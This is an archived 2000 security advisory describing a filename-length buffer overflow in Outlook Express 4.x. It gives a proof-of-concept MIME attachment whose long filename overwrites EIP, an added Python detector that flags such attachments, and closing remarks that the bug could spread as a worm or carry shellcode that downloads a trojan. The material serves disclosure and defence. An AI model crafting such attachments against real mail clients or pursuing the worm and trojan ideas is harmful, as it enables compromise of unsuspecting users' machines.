Subject: Overflow in Outlook Express 4.* - too long filenames with graphic format extension
From: Ultor (UltorHERT.ORG)
Date: Fri May 12 2000 - 07:05:28 CDT


==== APPLICATION AFFECTED

Outlook Express 4.* (5.* is not affected)

==== DESCRIPTION

All attached graphic files are automatically displayed by Outlook Express
while the e-mail is viewed. The problem is that a long filename with a *.jpg
or *.bmp extension causes an overflow if the filename length is longer than 256
characters.

==== EXAMPLE

We need more than 267 characters to overwrite EIP because 'C:\TEMP' sits at the
beginning of the buffer. This makes exploitation slightly harder. Here is an
example of such an e-mail:

------=_NextPart_000_0008_01BF5479.70140740
Content-Type: text/plain;
name="hert.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;

filename="AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jpg"

------=_NextPart_000_0008_01BF5479.70140740--

EIP is overwritten here by 'BBBB'.
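A mail-gateway check for the condition described above, added here as an example (not part of the original post): it parses a MIME message and reports attachment parts whose filename exceeds the 256-character limit the advisory names and ends in one of the image extensions it lists. The sample message, its sender and recipient addresses are constructed; the boundary string is the one from the e-mail above.

```python
import email
import os
from email import policy

# Limit and extensions taken from the advisory: Outlook Express 4.x renders
# attached images inline and overflows on filenames longer than 256 characters.
FILENAME_LIMIT = 256
RISKY_EXTENSIONS = (".jpg", ".bmp")


def find_overlong_image_attachments(raw_message):
    """Return (filename_length, extension) for every non-multipart part whose
    attachment filename is longer than FILENAME_LIMIT and has a risky extension."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename()  # from Content-Disposition, else Content-Type name=
        if not name:
            continue
        ext = os.path.splitext(name)[1].lower()
        if ext in RISKY_EXTENSIONS and len(name) > FILENAME_LIMIT:
            findings.append((len(name), ext))
    return findings


# Constructed sample: 263 'A's plus ".jpg" gives the 267 characters the
# advisory says are needed to reach EIP.
LONG_NAME = "A" * 263 + ".jpg"
BOUNDARY = "----=_NextPart_000_0008_01BF5479.70140740"
SAMPLE_MAIL = (
    "From: sender@example.invalid\r\n"
    "To: recipient@example.invalid\r\n"
    "Subject: constructed test message\r\n"
    "MIME-Version: 1.0\r\n"
    f'Content-Type: multipart/mixed; boundary="{BOUNDARY}"\r\n'
    "\r\n"
    f"--{BOUNDARY}\r\n"
    "Content-Type: text/plain\r\n"
    "\r\n"
    "body text\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Type: image/jpeg; name="hert.jpg"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    f'Content-Disposition: attachment; filename="{LONG_NAME}"\r\n'
    "\r\n"
    "/9j/4AAQSkZJRg==\r\n"
    f"--{BOUNDARY}--\r\n"
)

if __name__ == "__main__":
    print(find_overlong_image_attachments(SAMPLE_MAIL))  # [(267, '.jpg')]
```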

==== EXPLOITATION

It's a little hard to exploit because the buffer is located at an address containing
'00', and we get 'C:\TEMP' overwriting the stack before our data. You will need
some tricks to exploit this. I believe this bug could be very dangerous if
connected somehow with a worm, because you would only have to view the message to
run the exploit. Using shellcode which downloads a trojan from some URL onto the
affected machine would be an interesting idea too.

Greeetz to HERT,Lam3rZ,TESO

----------------------
Mark Bialoglowy [Ultorhert.org] --- Network Security Consultant
Age: 19 -- Country: PL -- PGP: http://www.hert.org/pgp/Ultor.asc
CODE: C / Delphi / w32asm / Linux / SQL / CGI / HTML / VRML / AI
----------------------
